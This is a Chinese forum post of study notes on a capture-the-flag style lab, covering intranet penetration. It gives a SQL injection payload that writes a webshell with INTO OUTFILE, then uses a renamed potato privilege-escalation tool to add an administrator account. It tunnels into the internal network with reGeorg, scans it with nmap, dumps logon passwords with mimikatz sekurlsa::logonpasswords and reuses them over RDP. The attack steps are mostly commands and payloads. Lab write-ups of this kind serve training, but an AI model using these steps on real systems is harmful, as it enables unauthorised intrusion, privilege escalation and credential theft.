内网穿透(上)——学习笔记

郎贤坤   ·   发表于 2022-01-20 20:57:56   ·   学习杂记
  1. 以猫舍靶场为例


连接木马http://afsgr16-b1ferw.aqlab.cn/?id=1%20and%201=2%20union%20select%201,”” into outfile ‘C:/phpStudy/WWW/123.php’ into outfile 这个函数是用来导出文件的。
把数据库得到的结果导出到某个文件(就是把这个一句话木马写入123.php里面然后通过into outfile这个函数导出来)

注意:这里的文件路经必须是绝对路径,可以输入一些错误的语句来让他报错,报出当前的绝对路径
2利用windows漏洞(最好用的就是提权神器烂土豆了^_^)
用菜刀连接木马右键打开虚拟终端输入命令 systeminfo查看计算机打了那些补丁
然后复制到提权网站看看还有那些漏洞没有恢复
在终端中打开烂土豆输入命令rrr.exe -p “net user”(当然啦rrr.exex是我是我重命名后的)

看到啦,现在我们的权限是一个系统的权限
然后再用命令rrr.exe -p “net user xx a1b2c3!qa /add”添加一个账户


在用net localgroup administrators xx /add来提升到管理员的一个权限就好啦


现在来看看我们的账户是不是一个管理员的权限


netstat -ano 查看端口(看看开没开远程桌面)也就是3389端口
这里注意一下哟,远程桌面只有管理员可以开

3.
我们连接的主机3389端口么有对外映射,无法连接到目标主机,
这里我们就需要一个php的中间媒介来帮助我们发起请求
tunnel.nosocket.php,直接用菜刀上传上去就好啦
然后访问这个文件
出现这个就说明这个php文件可以正常运行了

然后再打开Proxifier汉化版.exe
找到配置文件,打开代理服务器,然后再添加

然后再配置代理规则,这也在配置文件里面,代理规则

然后呢,打开reGeorg来连接

输入命令
python reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/aaa.php -l 127.0.0.1 -p 10086
-l 指定地址 -p 指定端口 -u 指定连接的文件
你把数据发送到-l所指定的地址和端口,那么数据会发送给-u所指定的文件处理。

直接连接 10.0.1.4
使用nmap扫描同内网机器


猕猴桃使用命令:
log 生成日志
privilege::debug 提升权限
sekurlsa::logonpasswords 抓取密码



多太机器可能有相同密码
mstsc.exe连接10.0.1.8

用户名金币积分时间理由
ghzlmc 0.80 0 2022-02-26 11:11:46 一个受益终生的帖子~~
一朵花花酱 1.00 0 2022-02-12 03:03:21 一个受益终生的帖子~~

打赏我,让我更有动力~

2 条回复   |  直到 2022-2-24 | 1368 次浏览

一朵花花酱
发表于 2022-2-12

评论列表

  • 加载数据中...

编写评论内容

wlwgo
发表于 2022-2-24

厉害了,进去来一pian

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.